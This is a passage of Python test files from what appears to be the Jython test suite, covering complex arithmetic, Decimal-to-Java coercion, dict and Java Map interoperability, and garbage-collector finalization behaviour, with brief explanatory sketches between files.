self.assertRaises(TypeError, complex.__coerce__, None, 1+2j)
def test_pow(self):
class Foo(object):
def __rpow__(self, other):
return other ** 2
# regression in 2.5 alphas
self.assertEqual((4+0j) ** Foo(), (16+0j))
def test___nonzero__(self):
self.assertTrue(0.25+0j)
self.assertTrue(25j)
def test_abs_big(self):
# These are close to overflow but don't
close = [ complex( 1.794e+308, 0.000e+00),
complex( 1.119e+308, 1.403e+308),
complex(-3.992e+307, 1.749e+308),
complex(-1.617e+308, 7.785e+307),
complex(-1.617e+308,-7.785e+307),
complex(-3.992e+307,-1.749e+308) ]
# These are a little bigger and do overflow
over = [ complex( 1.130e+308, 1.417e+308),
complex(-4.032e+307, 1.767e+308),
complex(-1.633e+308, 7.863e+307),
complex(-1.633e+308,-7.863e+307),
complex(-4.032e+307,-1.767e+308) ]
# If you start with infinity, the return is infinity, no overflow
infinities = [ complex(INF, 1), complex(NINF, 2), complex(3, INF), complex(4, NINF) ]
for z in close :
self.assertAlmostEquals(abs(z), 1.794e+308, delta=0.01e+308)
for z in over :
self.assertRaises(OverflowError, abs, z)
for z in infinities :
self.assertEqual(abs(z), INF)
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
class ComplexArithmeticTest(unittest.TestCase):
def almostEqual(self, a, b):
if a == b: # also accounts for infinities
return True
return abs(a - b) < 0.0000000001
def assertComplexEqual(self, x, y):
self.assertTrue(
(self.almostEqual(x.real, y.real) or (math.isnan(x.real) and math.isnan(y.real))) and \
(self.almostEqual(x.imag, y.imag) or (math.isnan(x.imag) and math.isnan(y.imag))),
"expected %r != actual %r" % (x, y))
def test_complex_arithmetic(self):
"""Verify *, /, +, - on representative complex numbers results in the same values as in CPython"""
# Verifies fix for http://bugs.jython.org/issue2460
re_comment = re.compile("^(\s*)\#")
with open(data_file("complex_arithmetic.txt")) as f:
for line in f:
if re_comment.match(line):
continue
op, a, b, result = line.split()
if result == "ZeroDivisionError":
self.assertRaises(ZeroDivisionError, getattr(operator, op), complex(a), complex(b))
else:
self.assertComplexEqual(complex(result), getattr(operator, op)(complex(a), complex(b)))
def test_main():
test_support.run_unittest(ComplexTest, ComplexArithmeticTest)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_decimal_jy.py
```python
import unittest
from test import test_support
from decimal import Decimal
from java.lang import Float, Double, Object
from java.math import BigDecimal
class TestJavaDecimal(unittest.TestCase):
def test_decimal(self):
x = Decimal("1.1")
y = x.__tojava__(BigDecimal)
self.assertTrue(isinstance(y, BigDecimal))
def test_object(self):
x = Decimal("1.1")
y = x.__tojava__(Object)
self.assertTrue(isinstance(y, BigDecimal))
def test_float(self):
x = Decimal("1.1")
y = x.__tojava__(Float)
self.assertTrue(isinstance(y, Float))
def test_double(self):
x = Decimal("1.1")
y = x.__tojava__(Double)
self.assertTrue(isinstance(y, Double))
if __name__ == '__main__':
unittest.main()
```
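The tests above exercise Jython's `__tojava__` coercion on `Decimal`. A minimal sketch of the same conversion outside the test harness, assuming a Jython runtime where `java.math` and `java.lang` are importable:

```python
# Sketch only: Decimal-to-Java coercion as exercised by the tests above.
# Assumes Jython, where java.* packages are importable and __tojava__ exists.
from decimal import Decimal
from java.math import BigDecimal
from java.lang import Double

d = Decimal("1.1")
as_big = d.__tojava__(BigDecimal)   # a java.math.BigDecimal holding 1.1
as_dbl = d.__tojava__(Double)       # a java.lang.Double approximation
print type(as_big), type(as_dbl)
```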
#### File: Lib/test/test_dict_jy.py
```python
from test import test_support
import unittest
import UserDict
from collections import defaultdict
import test_dict
from java.util import HashMap, LinkedHashMap, Hashtable
from java.util.concurrent import ConcurrentHashMap
from org.python.core import PyStringMap as stringmap
class DictInitTest(unittest.TestCase):
def testInternalSetitemInInit(self):
"""Test for http://jython.org/bugs/1816134
CPython's dict uses an internal setitem method to initialize itself
rather than the one on its subclasses, and this tests that Jython does
as well.
"""
class Subdict(dict):
def __init__(self):
super(Subdict, self).__init__([('a',1)])
self.createdInInit = 1
def __setitem__(self, key, value):
super(Subdict, self).__setitem__(key, value)
assert hasattr(self, 'createdInInit')
self.createdInInit = value
s = Subdict()
s[7] = 'called'
self.assertEquals('called', s.createdInInit)
def testUnhashableKeys(self):
try:
a = {[1]:2}
except TypeError:
pass
else:
self.fail("list as dict key should raise TypeError")
try:
a = {{1:2}:3}
except TypeError:
pass
else:
self.fail("dict as dict key should raise TypeError")
class DictCmpTest(unittest.TestCase):
"Test for http://bugs.jython.org/issue1031"
def testDictCmp(self):
# 'Implicit' comparison of dicts against instances of other types
# shouldn't raise an exception:
self.assertNotEqual({}, '')
# The same, but explicitly calling __cmp__ should raise TypeError:
self.assertRaises(TypeError, {}.__cmp__, '')
def testDictDerivedCmp(self):
# With derived classes that don't override __cmp__, the behaviour
# should be the same as with dicts:
class derived_dict(dict): pass
self.assertEqual(derived_dict(), {})
self.assertNotEqual(derived_dict(), '')
self.assertRaises(TypeError, derived_dict().__cmp__, '')
# But, if they *override* __cmp__ and raise TypeError from there, we
# have exception raised when checking for equality...
class non_comparable_dict(dict):
def __cmp__(self, other):
raise TypeError, "I always raise TypeError"
self.assertRaises(TypeError, lambda: non_comparable_dict() == '')
self.assertRaises(TypeError, non_comparable_dict().__cmp__, '')
# ...unless you compare it with other dicts:
# self.assertEqual(non_comparable_dict(), {})
# The same happens even if the overridden __cmp__ does nothing apart
# from calling super:
class dummy_dict_with_cmp(dict):
def __cmp__(self, other):
return super(dummy_dict_with_cmp, self).__cmp__(other)
self.assertEqual(dummy_dict_with_cmp(), {})
# But TypeError is raised when comparing against other types
self.assertRaises(TypeError, lambda: dummy_dict_with_cmp() == '')
self.assertRaises(TypeError, dummy_dict_with_cmp().__cmp__, '')
# Finally, the Python implementation shouldn't be tricked by not
# implementing __cmp__ on the actual type of the dict-derived instance,
# but implementing it on a superclass.
class derived_dict_with_custom_cmp(dict):
def __cmp__(self, other):
return 0
class yet_another_dict(derived_dict_with_custom_cmp): pass
self.assertEqual(derived_dict_with_custom_cmp(), '')
self.assertEqual(yet_another_dict(), '')
class DictMiscTest(unittest.TestCase):
def test_pop_key_error(self):
# tests http://bugs.jython.org/issue2247
with self.assertRaisesRegexp(KeyError, r"^1$"):
{}.pop(1)
with self.assertRaisesRegexp(KeyError, r"^\(\)$"):
{}.pop(())
with self.assertRaisesRegexp(KeyError, r"^frozenset\(\[\]\)$"):
{}.pop(frozenset())
class DerivedDictTest(unittest.TestCase):
"Tests for derived dict behaviour"
def test_raising_custom_key_error(self):
class CustomKeyError(KeyError):
pass
class DerivedDict(dict):
def __getitem__(self, key):
raise CustomKeyError("custom message")
self.assertRaises(CustomKeyError, lambda: DerivedDict()['foo'])
def test_issue1676(self):
#See http://bugs.jython.org/issue1676
x=defaultdict()
#This formerly caused an NPE.
self.assertEqual(None, x.pop(None,None))
def test_big_dict(self):
"""Verify that fairly large collection literals of primitives can be constructed."""
# use \n to separate to avoid parser problems
d = eval("{" + ",\n".join(("'key{}': {}".format(x, x) for x in xrange(16000))) +"}")
self.assertEqual(len(d), 16000)
self.assertEqual(sum(d.itervalues()), 127992000)
class JavaIntegrationTest(unittest.TestCase):
"Tests for instantiating dicts from Java maps and hashtables"
type2test = HashMap
def test_map(self):
x = self.type2test()
x.put('a', 1)
x.put('b', 2)
x.put('c', 3)
x.put((1,2), "xyz")
y = dict(x)
self.assertEqual(set(y.items()), set([('a', 1), ('b', 2), ('c', 3), ((1,2), "xyz")]))
def test_map_builtin_pymethods(self):
x = self.type2test()
x['a'] = 1
x[(1, 2)] = 'xyz'
self.assertEqual({tup for tup in x.iteritems()}, {('a', 1), ((1, 2), 'xyz')})
self.assertEqual({tup for tup in x.itervalues()}, {1, 'xyz'})
self.assertEqual({tup for tup in x.iterkeys()}, {'a', (1, 2)})
self.assertEqual(str(x), repr(x))
self.assertEqual(type(str(x)), type(repr(x)))
def test_equal(self):
for d in ({}, {1:2}):
x = self.type2test(d)
self.assertEqual(x, d)
self.assertEqual(d, x)
self.assertEqual(x, HashMap(d))
def test_remove(self):
x = self.type2test({'a': 1})
del x['a']
self.assertEqual(x, {})
x = self.type2test({})
with self.assertRaises(KeyError):
del x[0]
def test_equality_empty_dict(self):
jmap = self.type2test()
self.assertTrue(jmap == {})
self.assertTrue({} == jmap)
def test_equality_simple_dict(self):
jmap = self.type2test()
self.assertFalse({'a': 1} == jmap)
self.assertFalse(jmap == {'a': 1})
def test_equality_mixed_types_dict(self):
ref = {False:0, 'a':1, u'b':2L, 3:"3"}
alt = {0:False, u'a':True, 'b':2, 3:"3"}
self.assertEqual(ref, alt) # test assumption
jref = self.type2test(ref)
for v in [ref, alt, jref]:
self.assertTrue(jref == v)
self.assertTrue(v == jref)
self.assertTrue(jref == self.type2test(v))
self.assertTrue(self.type2test(v) == jref)
alt1 = ref.copy(); alt1['a'] = 2;
alt2 = ref.copy(); del alt2['a'];
alt3 = ref.copy(); alt3['c'] = [];
for v in [alt1, alt2, alt3, {}]:
self.assertFalse(jref == v)
self.assertFalse(v == jref)
self.assertFalse(jref == self.type2test(v))
self.assertFalse(self.type2test(v) == jref)
# Test for http://bugs.jython.org/issue2639
# This is to test the != comparisons between Java and Python maps/dict
def test_inequality_empty_dict(self):
jmap = self.type2test()
self.assertFalse(jmap != {})
self.assertFalse({} != jmap)
def test_inequality_simple_dict(self):
jmap = self.type2test()
self.assertTrue(jmap != {'a': 1})
self.assertTrue({'a': 1} != jmap)
def test_inequality_mixed_types_dict(self):
ref = {False:0, 'a':1, u'b':2L, 3:"3"}
alt = {0:False, u'a':True, 'b':2, 3:"3"}
self.assertEqual(ref, alt) # test assumption
jref = self.type2test(ref)
for v in [ref, alt, jref]:
self.assertFalse(jref != v)
self.assertFalse(v != jref)
self.assertFalse(jref != self.type2test(v))
self.assertFalse(self.type2test(v) != jref)
alt1 = ref.copy(); alt1['a'] = 2;
alt2 = ref.copy(); del alt2['a'];
alt3 = ref.copy(); alt3['c'] = [];
for v in [alt1, alt2, alt3, {}]:
self.assertTrue(jref != v)
self.assertTrue(v != jref)
self.assertTrue(jref != self.type2test(v))
self.assertTrue(self.type2test(v) != jref)
class JavaHashMapTest(JavaIntegrationTest):
type2test = HashMap
class JavaLinkedHashMapTest(JavaIntegrationTest):
type2test = LinkedHashMap
class JavaHashtableTest(JavaIntegrationTest):
type2test = Hashtable
class JavaConcurrentHashMapTest(JavaIntegrationTest):
type2test = ConcurrentHashMap
class JavaDictTest(test_dict.DictTest):
# Extend Python standard tests for dict. (Also used for Map proxies.)
type2test = dict
def test_copy_java_hashtable(self):
x = Hashtable()
xc = x.copy()
self.assertEqual(type(x), type(xc))
def test_repr_value_None(self):
x = self.type2test({1:None})
self.assertEqual(repr(x), '{1: None}')
def test_set_return_None(self):
x = self.type2test({1:2})
self.assertEqual(x.__setitem__(1, 3), None)
self.assertEqual(x.__getitem__(1), 3)
def test_del_return_None(self):
x = self.type2test({1:2})
self.assertEqual(x.__delitem__(1), None)
self.assertEqual(len(x), 0)
def assert_property(self, prop, a, b):
prop(self._make_dict(a), self._make_dict(b))
prop(a, self._make_dict(b))
prop(self._make_dict(a), b)
def assert_not_property(self, prop, a, b):
with self.assertRaises(AssertionError):
prop(self._make_dict(a), self._make_dict(b))
with self.assertRaises(AssertionError):
prop(a, self._make_dict(b))
with self.assertRaises(AssertionError):
prop(self._make_dict(a), b)
def test_list_equality(self):
class A(dict): pass
d = {'a':1, u'\xe7':2, u'\U00010842':3, 42:None}
for dtype in (dict, self.type2test, A):
self.assertEquals([dtype()], [dict()])
self.assertEquals([dtype(d)], [d])
# Some variants with unicode keys
def test_repr_unicode(self):
d = self._make_dict({})
d[u'3\uc6d4'] = 2
self.assertEqual(repr(d), "{u'3\\uc6d4': 2}")
d = self._make_dict({})
d[2] = u'\u039c\u03ac\u03c1\u03c4\u03b9\u03bf\u03c2'
self.assertEqual(repr(d), "{2: u'\\u039c\\u03ac\\u03c1\\u03c4\\u03b9\\u03bf\\u03c2'}")
d = self._make_dict({})
d[u'\uc6d4'] = d
self.assertEqual(repr(d), "{u'\\uc6d4': {...}}")
def test_fromkeys_unicode(self):
self.assertEqual(self.type2test.fromkeys(u'\U00010840\U00010841\U00010842', u'\u1810'),
{u'\U00010840':u'\u1810', u'\U00010841':u'\u1810', u'\U00010842':u'\u1810'})
self.assertEqual(self.type2test.fromkeys(u'\U00010840\U00010841\U00010842'),
{u'\U00010840':None, u'\U00010841':None, u'\U00010842':None})
# NOTE: when comparing dictionaries below exclusively in Java
# space, keys like 1 and 1L are different objects. Only when they
# are brought into Python space by Py.java2py, as is needed when
# comparing a Python dict with a Java Map, do we see them become
# equal.
def test_le(self):
self.assert_property(self.assertLessEqual, {}, {})
self.assert_property(self.assertLessEqual, {1: 2}, {1: 2})
self.assert_not_property(self.assertLessEqual, {1: 2, 3: 4}, {1: 2})
self.assert_property(self.assertLessEqual, {}, {1: 2})
self.assertLessEqual(self._make_dict({1: 2}), {1L: 2L, 3L: 4L})
self.assertLessEqual({1L: 2L}, self._make_dict({1: 2, 3L: 4L}))
def test_lt(self):
self.assert_not_property(self.assertLess, {}, {})
self.assert_not_property(self.assertLess, {1: 2}, {1: 2})
self.assert_not_property(self.assertLessEqual, {1: 2, 3: 4}, {1: 2})
self.assert_property(self.assertLessEqual, {}, {1: 2})
self.assertLess(self._make_dict({1: 2}), {1L: 2L, 3L: 4L})
self.assertLess({1L: 2L}, self._make_dict({1: 2, 3L: 4L}))
def test_ge(self):
self.assert_property(self.assertGreaterEqual, {}, {})
self.assert_property(self.assertGreaterEqual, {1: 2}, {1: 2})
self.assert_not_property(self.assertLessEqual, {1: 2, 3: 4}, {1: 2})
self.assert_property(self.assertLessEqual, {}, {1: 2})
self.assertGreaterEqual(self._make_dict({1: 2, 3: 4}), {1L: 2L})
self.assertGreaterEqual({1L: 2L, 3L: 4L}, self._make_dict({1: 2}))
def test_gt(self):
self.assert_not_property(self.assertGreater, {}, {})
self.assert_not_property(self.assertGreater, {1: 2}, {1: 2})
self.assert_not_property(self.assertLessEqual, {1: 2, 3: 4}, {1: 2})
self.assert_property(self.assertLessEqual, {}, {1: 2})
self.assertGreater(self._make_dict({1: 2, 3: 4}), {1L: 2L})
self.assertGreater({1L: 2L, 3L: 4L}, self._make_dict({1: 2}))
class NullAcceptingDictTest(JavaDictTest):
# Extension of Java Map proxy tests to cases where the underlying
# container is able to accept nulls. Same tests as for dict (mostly).
def test_missing(self):
# Proxy map types are not expected to support __missing__.
self.assertFalse(hasattr(self.type2test, "__missing__"))
self.assertFalse(hasattr(self._make_dict({}), "__missing__"))
def test_fromkeys(self):
# Adapted from test_dict.DictTest.test_fromkeys by removal of test
# sub-classes since this does not work with proxy types.
Dict = self.type2test
self.assertEqual(Dict.fromkeys('abc'), {'a':None, 'b':None, 'c':None})
d = self._make_dict({})
self.assertIsNot(d.fromkeys('abc'), d)
self.assertEqual(d.fromkeys('abc'), {'a':None, 'b':None, 'c':None})
self.assertEqual(d.fromkeys((4,5),0), {4:0, 5:0})
self.assertEqual(d.fromkeys([]), {})
def g():
yield 1
self.assertEqual(d.fromkeys(g()), {1:None})
self.assertRaises(TypeError, self._make_dict({}).fromkeys, 3)
class Exc(Exception): pass
class BadSeq(object):
def __iter__(self):
return self
def next(self):
raise Exc()
self.assertRaises(Exc, Dict.fromkeys, BadSeq())
class NullRejectingDictTest(NullAcceptingDictTest):
# Adaptation of Java Map proxy tests to cases where the underlying
# container cannot accept nulls, therefore None cannot be stored.
def test_reject_none(self):
d = self._make_dict({'a': 1})
with self.assertRaises(ValueError):
d['a'] = None
with self.assertRaises(ValueError):
d['b'] = None
# There is no __init__ or __new__ we can customise, so raises NullPointerException.
# self.assertRaises(ValueError, self._make_dict, {'c': None})
self.assertRaises(ValueError, d.update, {'c': None})
with self.assertRaises(ValueError):
d.update(c=None)
self.assertRaises(ValueError, d.fromkeys, 'cde')
self.assertRaises(ValueError, d.fromkeys, 'cde', None)
def test_list_equality(self):
class A(dict): pass
d = {'a':1, u'\xe7':2, u'\U00010842':3, 42:True}
for dtype in (dict, self.type2test, A):
self.assertEquals([dtype()], [dict()])
self.assertEquals([dtype(d)], [d])
@unittest.skip("not relevant since cannot hold None.")
def test_repr_value_None(self): pass
def test_fromkeys(self):
# Adapted from test_dict.DictTest.test_fromkeys avoiding None
# (except as test) and by removal of test sub-classing.
Dict = self.type2test
self.assertEqual(Dict.fromkeys('abc', 42), {'a':42, 'b':42, 'c':42})
self.assertRaises(TypeError, self._make_dict({}).fromkeys, 3, 42)
self.assertRaises(ValueError, self._make_dict({}).fromkeys, 'abc', None)
d = self._make_dict({})
self.assertIsNot(d.fromkeys('abc', 42), d)
self.assertEqual(d.fromkeys('abc', 42), {'a':42, 'b':42, 'c':42})
self.assertEqual(d.fromkeys((4,5),0), {4:0, 5:0})
self.assertEqual(d.fromkeys([], 42), {})
def g():
yield 1
self.assertEqual(d.fromkeys(g(), 42), {1:42})
self.assertRaises(TypeError, self._make_dict({}).fromkeys, 3)
self.assertRaises(TypeError, self._make_dict({}).fromkeys, 3, 42)
class Exc(Exception): pass
class BadSeq(object):
def __iter__(self):
return self
def next(self):
raise Exc()
self.assertRaises(Exc, Dict.fromkeys, BadSeq())
def test_fromkeys_unicode(self):
self.assertEqual(self.type2test.fromkeys(u'\U00010840\U00010841\U00010842', u'\u1810'),
{u'\U00010840':u'\u1810', u'\U00010841':u'\u1810', u'\U00010842':u'\u1810'})
def test_setdefault(self):
# Adapted from test_dict.DictTest.test_setdefault avoiding None
d = self._make_dict({'key0': False})
d.setdefault('key0', [])
self.assertIs(d.setdefault('key0'), False)
d.setdefault('key', []).append(3)
self.assertEqual(d['key'][0], 3)
d.setdefault('key', []).append(4)
self.assertEqual(len(d['key']), 2)
self.assertRaises(TypeError, d.setdefault)
class Exc(Exception): pass
class BadHash(object):
fail = False
def __hash__(self):
if self.fail:
raise Exc()
else:
return 42
x = BadHash()
d[x] = 42
x.fail = True
self.assertRaises(Exc, d.setdefault, x, [])
@unittest.skip("See bjo #2746. Java keys() returns an Enumerator.")
def test_has_key(self): pass # defining here only so we can skip it
@unittest.skip("See bjo #2746. Java keys() returns an Enumerator.")
def test_keys(self): pass # defining here only so we can skip it
class PyStringMapDictTest(test_dict.DictTest):
# __dict__ for objects uses PyStringMap for historical reasons, so
# we have to test separately
type2test = stringmap
def test_missing(self):
Dict = self.type2test
# Make sure dict doesn't have a __missing__ method
self.assertFalse(hasattr(Dict, "__missing__"))
self.assertFalse(hasattr(self._make_dict({}), "__missing__"))
# PyStringMap is not expected to support __missing__ as it cannot be sub-classed.
# At least, it wasn't added when it was added to PyDictionary.
def test_fromkeys(self):
# Based on test_dict.DictTest.test_fromkeys, without sub-classing stringmap
Dict = self.type2test
self.assertEqual(Dict.fromkeys('abc'), {'a':None, 'b':None, 'c':None})
d = self._make_dict({})
self.assertIsNot(d.fromkeys('abc'), d)
self.assertEqual(d.fromkeys('abc'), {'a':None, 'b':None, 'c':None})
self.assertEqual(d.fromkeys((4,5),0), {4:0, 5:0})
self.assertEqual(d.fromkeys([]), {})
def g():
yield 1
self.assertEqual(d.fromkeys(g()), {1:None})
self.assertRaises(TypeError, self._make_dict({}).fromkeys, 3)
class Exc(Exception): pass
class BadSeq(object):
def __iter__(self):
return self
def next(self):
raise Exc()
self.assertRaises(Exc, Dict.fromkeys, BadSeq())
# test fast path for dictionary inputs
d = Dict(zip(range(6), range(6)))
self.assertEqual(Dict.fromkeys(d, 0), Dict(zip(range(6), [0]*6)))
class JavaHashMapDictTest(NullAcceptingDictTest):
type2test = HashMap
class JavaLinkedHashMapDictTest(NullAcceptingDictTest):
type2test = LinkedHashMap
class JavaHashtableDictTest(NullRejectingDictTest):
type2test = Hashtable
class JavaConcurrentHashMapDictTest(NullRejectingDictTest):
type2test = ConcurrentHashMap
def test_main():
test_support.run_unittest(
DictInitTest,
DictCmpTest,
DictMiscTest,
DerivedDictTest,
JavaHashMapTest,
JavaLinkedHashMapTest,
JavaConcurrentHashMapTest,
JavaHashtableTest,
JavaDictTest,
PyStringMapDictTest,
JavaHashMapDictTest,
JavaLinkedHashMapDictTest,
JavaHashtableDictTest,
JavaConcurrentHashMapDictTest,
)
if __name__ == '__main__':
test_main()
```
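The Map-proxy tests above rely on Jython giving `java.util` maps Python dict semantics. A minimal sketch of that interop, assuming a Jython runtime:

```python
# Sketch only: java.util maps behave like Python dicts under Jython,
# as the JavaIntegrationTest cases above assert.
from java.util import HashMap

m = HashMap()
m['a'] = 1           # routed to Map.put
m[(1, 2)] = 'xyz'    # tuples work as keys on the Python side
print dict(m) == {'a': 1, (1, 2): 'xyz'}   # True: copies into a real dict
print m == {'a': 1, (1, 2): 'xyz'}         # True: the proxy compares equal to a dict
```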
#### File: Lib/test/test_gc_jy.py
```python
import unittest
from test import test_support
import time
import gc
import weakref
from Queue import Queue
try:
from java.lang import System, Runnable, Class, Object
from javatests import GCTestHelper
except ImportError:
# i.e. we are not running on Jython
pass
class GCTests_Jy_CyclicGarbage(unittest.TestCase):
@classmethod
def setUpClass(cls):
#Jython-specific block:
try:
cls.savedJythonGCFlags = gc.getJythonGCFlags()
#the finalizer-related tests need this flag to pass in Jython:
gc.addJythonGCFlags(gc.DONT_FINALIZE_CYCLIC_GARBAGE)
gc.stopMonitoring()
except Exception:
pass
@classmethod
def tearDownClass(cls):
try:
gc.setJythonGCFlags(cls.savedJythonGCFlags)
except Exception:
pass
# In contrast to the tests in test_gc, these finalizer tests shall work
# even if gc-monitoring is disabled.
def test_finalizer(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
class A:
def __del__(self): pass
class B:
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
time.sleep(4)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
def test_finalizer_newclass(self):
# A() is uncollectable if it is part of a cycle, make sure it shows up
# in gc.garbage.
class A(object):
def __del__(self): pass
class B(object):
pass
a = A()
a.a = a
id_a = id(a)
b = B()
b.b = b
gc.collect()
del a
del b
self.assertNotEqual(gc.collect(), 0)
time.sleep(1)
for obj in gc.garbage:
if id(obj) == id_a:
del obj.a
break
else:
self.fail("didn't find obj in garbage (finalizer)")
gc.garbage.remove(obj)
@unittest.skipUnless(test_support.is_jython,
'CPython has no monitor state')
def test_manual_monitoring(self):
# since tuples are immutable we close the loop with a list
l = []
t = (l,)
l.append(t)
gc.monitorObject(l)
#gc.monitorObject(t) <- intentionally only monitor one of them
gc.collect()
del t
del l
# Note that usually two collected objects would be expected - l and t.
# But we intentionally only monitored one of them, so only one should
# be counted.
self.assertEqual(gc.collect(), 1)
@unittest.skipUnless(test_support.is_jython,
'CPython has no gc preprocess and postprocess features')
class GCTests_Jy_preprocess_and_postprocess(unittest.TestCase):
@classmethod
def setUpClass(cls):
#Jython-specific block:
try:
cls.savedJythonGCFlags = gc.getJythonGCFlags()
gc.setMonitorGlobal(True)
except Exception:
pass
@classmethod
def tearDownClass(cls):
try:
gc.setJythonGCFlags(cls.savedJythonGCFlags)
except Exception:
pass
def test_finalization_preprocess_and_postprocess(self):
# Note that this test is repeated here (it already appears in another class
# in this module) to check that everything still works as it should with
# a different flag context.
comments = []
self0 = self
class A:
def __del__(self):
self0.assertIn("run PreProcess", comments)
comments.append("A del")
# let's simulate a time-consuming finalizer
# to ensure that post finalization processing
# is sensitive to this
time.sleep(0.5)
comments.append("A del done")
class PreProcess(Runnable):
def run(self):
self0.assertEqual(comments, [])
comments.append("run PreProcess")
class PostProcess(Runnable):
def run(self):
self0.assertIn("run PreProcess", comments)
self0.assertIn("A del", comments)
self0.assertIn("A del done", comments)
comments.append("run PostProcess")
a = A()
a = None
prePr = PreProcess()
postPr = PostProcess()
time.sleep(1) # <- so that the newly registered processes do not
# become subject to a previous run (remember: we
# are not in monitor mode, i.e. gc runs asynchronously)
gc.registerPreFinalizationProcess(prePr)
gc.registerPostFinalizationProcess(postPr)
# Note that order matters here:
# If the flag gc.DONT_FINALIZE_RESURRECTED_OBJECTS is used,
# gc.registerPostFinalizationProcess(postPr, 0) would lead to failure,
# because postPr asserts that a's finalizer already ran. Since
# DONT_FINALIZE_RESURRECTED_OBJECTS also inserted a postprocess,
# to perform delayed finalization, the 0-index would prepend postPr
# before the process that actually runs the finalizers.
System.gc()
# we wait a bit longer here, since PostProcess runs asynchronously
# and must wait for the finalizer of A
time.sleep(2)
self.assertIn("run PostProcess", comments)
comments = []
gc.unregisterPreFinalizationProcess(prePr)
gc.unregisterPostFinalizationProcess(postPr)
def test_with_extern_NonPyObjectFinalizer_that_notifies_gc(self):
comments = []
class A:
def __init__(self, index):
self.index = index
def __del__(self):
comments.append("A_del_"+str(self.index))
class PreProcess(Runnable):
preCount = 0
def run(self):
PreProcess.preCount += 1
class PostProcess(Runnable):
postCount = 0
def run(self):
PostProcess.postCount += 1
prePr = PreProcess()
postPr = PostProcess()
time.sleep(1) # <- so that the newly registered processes do not
# become subject to a previous run (remember: we
# are not in monitor mode, i.e. gc runs asynchronously)
gc.registerPreFinalizationProcess(prePr)
gc.registerPostFinalizationProcess(postPr)
for i in range(4):
f = A(i)
del f
#NastyFinalizer would cause this test occasionally to fail
externFinalizer = GCTestHelper.NotSoNastyFinalizer()
del externFinalizer
for i in range(4, 8):
f = A(i)
del f
System.gc()
# we wait a bit longer here, since PostProcess runs asynchronously
# and must wait for the finalizer of A
time.sleep(4)
self.assertEqual(len(comments), 8)
self.assertEqual(PreProcess.preCount, 1)
self.assertEqual(PostProcess.postCount, 1)
comments = []
gc.unregisterPreFinalizationProcess(prePr)
gc.unregisterPostFinalizationProcess(postPr)
@unittest.skipUnless(test_support.is_jython,
'This class tests detailed Jython-specific behavior.')
class GCTests_Jy_Delayed_Finalization(unittest.TestCase):
@classmethod
def setUpClass(cls):
#Jython-specific block:
try:
cls.savedJythonGCFlags = gc.getJythonGCFlags()
#the finalizer-related tests need this flag to pass in Jython:
gc.addJythonGCFlags(gc.DONT_FINALIZE_RESURRECTED_OBJECTS)
gc.stopMonitoring()
except Exception:
pass
@classmethod
def tearDownClass(cls):
try:
gc.setJythonGCFlags(cls.savedJythonGCFlags)
except Exception:
pass
# Tests from GCTests_Jy_preprocess_and_postprocess are repeated here
# without monitoring.
def test_finalization_preprocess_and_postprocess(self):
# Note that this test is repeated here (it already appears in another class
# in this module) to check that everything still works as it should with
# a different flag context.
comments = []
self0 = self
class A:
def __del__(self):
self0.assertIn("run PreProcess", comments)
comments.append("A del")
# let's simulate a time-consuming finalizer
# to ensure that post finalization processing
# is sensitive to this
time.sleep(0.5)
comments.append("A del done")
class PreProcess(Runnable):
def run(self):
self0.assertEqual(comments, [])
comments.append("run PreProcess")
class PostProcess(Runnable):
def run(self):
self0.assertIn("run PreProcess", comments)
self0.assertIn("A del", comments)
self0.assertIn("A del done", comments)
comments.append("run PostProcess")
a = A()
a = None
prePr = PreProcess()
postPr = PostProcess()
time.sleep(2) # <- so that the newly registered processes do not
# become subject to a previous run
gc.registerPreFinalizationProcess(prePr)
gc.registerPostFinalizationProcess(postPr)
# Note that order matters here:
# If the flag gc.DONT_FINALIZE_RESURRECTED_OBJECTS is used,
# gc.registerPostFinalizationProcess(postPr, 0) would lead to failure,
# because postPr asserts that a's finalizer already ran. Since
# DONT_FINALIZE_RESURRECTED_OBJECTS also inserted a postprocess,
# to perform delayed finalization, the 0-index would prepend postPr
# before the process that actually runs the finalizers.
System.gc()
# we wait a bit longer here, since PostProcess runs asynchronously
# and must wait for the finalizer of A
time.sleep(2)
self.assertIn("run PostProcess", comments)
comments = []
gc.unregisterPreFinalizationProcess(prePr)
gc.unregisterPostFinalizationProcess(postPr)
def test_with_extern_NonPyObjectFinalizer_that_notifies_gc(self):
comments = []
class A:
def __init__(self, index):
self.index = index
def __del__(self):
comments.append("A_del_"+str(self.index))
class PreProcess(Runnable):
preCount = 0
def run(self):
PreProcess.preCount += 1
class PostProcess(Runnable):
postCount = 0
def run(self):
PostProcess.postCount += 1
prePr = PreProcess()
postPr = PostProcess()
time.sleep(1) # <- so that the newly registered processes do not
# become subject to a previous run (remember: we
# are not in monitor mode, i.e. gc runs asynchronously)
gc.registerPreFinalizationProcess(prePr)
gc.registerPostFinalizationProcess(postPr)
for i in range(4):
f = A(i)
del f
# NastyFinalizer would cause this test occasionally to fail
externFinalizer = GCTestHelper.NotSoNastyFinalizer()
del externFinalizer
for i in range(4, 8):
f = A(i)
del f
System.gc()
# we wait a bit longer here, since PostProcess runs asynchronously
# and must wait for the finalizer of A
time.sleep(4)
self.assertEqual(len(comments), 8)
self.assertEqual(PreProcess.preCount, 1)
self.assertEqual(PostProcess.postCount, 1)
comments = []
gc.unregisterPreFinalizationProcess(prePr)
gc.unregisterPostFinalizationProcess(postPr)
def test_delayedFinalization(self):
#time.sleep(2)
resurrect = []
comments = []
class Test_Finalizable(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
class Test_Resurrection(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<"+self.name+">"
def __del__(self):
comments.append("del "+self.name)
if hasattr(self, "toResurrect"):
resurrect.append(self.toResurrect)
a = Test_Finalizable("a")
a.b = Test_Finalizable("b")
c = Test_Resurrection("c")
c.a = a
c.toResurrect = Test_Finalizable("d")
del a
del c
self.assertNotEqual(gc.collect(), 0)
time.sleep(2)
# Note that CPython would collect a, b and c in one run.
# With gc.DONT_FINALIZE_RESURRECTED_OBJECTS set, Jython
# would not collect a and b in the same run as c,
# because a and b might have been resurrected by c, and
# Java offers no way to detect such resurrection other
